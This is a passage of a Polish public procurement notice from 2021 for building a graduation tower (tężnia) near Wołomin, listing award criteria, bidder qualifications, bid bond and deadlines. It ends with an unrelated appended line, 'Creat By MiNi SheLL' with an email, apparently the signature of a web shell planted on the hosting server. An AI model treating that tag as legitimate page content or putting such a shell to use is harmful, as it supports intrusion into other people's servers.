techniczną i zagospodarowaniem terenu.<br/>2.8 Wykonać dokumentację powykonawczą. dostarczyć karty techniczne, certyfikaty, itp. w 2 egzemplarzach. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45212100-7 - Roboty budowlane w zakresie obiektów wypoczynkowych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">112 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">.Zamawiający przewiduje udzielania zamówień, o których mowa w art. 214 ust. 1 pkt 7 i 8 p.z.p. polegajacych na powtórzeniu podobnych robót i dostaw w zakresie robót i dostaw w tym :<br/>-- dostawa i montaż urządzeń tężni <br/>Zamówienie udzielone będzie na warunkach określonych w projektowanych postanowieniach umowy</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą ofertę zostanie wybrana oferta z największą<br/>łączną liczbą punktów. Sposób obliczania punktacji: Po = C + T</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej ( DLA KAŻDEJ CZESCI ) :<br/>Zamawiający wymaga aby posiadał środki finansowe lub zdolność kredytową na kwotę minimum 70 000,00 zł <br/><br/>4) zdolności technicznej lub zawodowej:<br/>a) w zakresie wiedzy i doświadczenia – – zamawiający wymaga, aby Wykonawca wykazał,<br/>że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał (zakończył) co najmniej dwie roboty budowlane polegające na budowie, rozbudowie, przebudowie, modernizacji tęzni wartości robót minimum 70.000,00 zł każda – dla każdej części.<br/> b) w zakresie potencjału kadrowego – zamawiający wymaga, aby wykonawca wykazał, że dysponuje lub będzie dysponował co najmniej:<br/>1)	jednym Projektantem, który posiada uprawnienia budowlane konstrukcyjno – budowlane, do projektowania bez ograniczeń lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów oraz co najmniej dwuletnie doświadczenie w pełnieniu funkcji projektanta- dla każdej części,<br/><br/>2)	jednym Kierownikiem budowy, który posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno – budowlanej bez ograniczeń lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów oraz co najmniej dwuletnie doświadczenie w pełnieniu funkcji kierownika budowy przy realizacji minimum dwóch zadań polegających na budowie, przebudowie, rozbudowie, modernizacji tężni o wartości robót minimum 70.000,00 zł każda - dla każdej części, <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy p.z.p., sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, porównywalnych z robotami budowlanymi stanowiącymi przedmiot zamówienia, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty - załącznik nr 3 do SWZ;<br/>2) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego , w szczególności odpowiedzialnych za świadczenie usług, kontrole jakości lub kierowanie robotami budowlanymi , wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami- załącznik nr 4 do SWZ;<br/>3) informacja banku lub spółdzielczej kasy oszczędnościowo -kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: 1 000,00 ZŁ (słownie: tysiąc 00/100 złotych);- dla każdego zadania <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> zgodnie z pkt XII SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z paragrafem 15 Projektowanych postanowień umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-04 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/wolomin</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-04 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-20 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com